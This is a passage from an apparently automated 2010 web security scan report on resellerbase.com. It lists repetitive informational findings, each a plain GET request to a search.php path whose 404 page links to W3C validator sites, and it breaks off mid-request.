<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.232. http://www.resellerbase.com/detail/46/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/46/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.233. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.234. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.235. http://www.resellerbase.com/detail/46/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/46/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.236. http://www.resellerbase.com/detail/46/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/46/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.237. http://www.resellerbase.com/detail/5/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.238. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.239. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.240. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.241. http://www.resellerbase.com/detail/5/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/5/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.242. http://www.resellerbase.com/detail/5/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/5/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.243. http://www.resellerbase.com/detail/6/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:01:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.244. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:01:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.245. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:01:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.246. http://www.resellerbase.com/detail/6/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/6/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:01:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.247. http://www.resellerbase.com/detail/6/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/6/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:01:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.248. http://www.resellerbase.com/detail/7/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/7/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.249. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.250. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
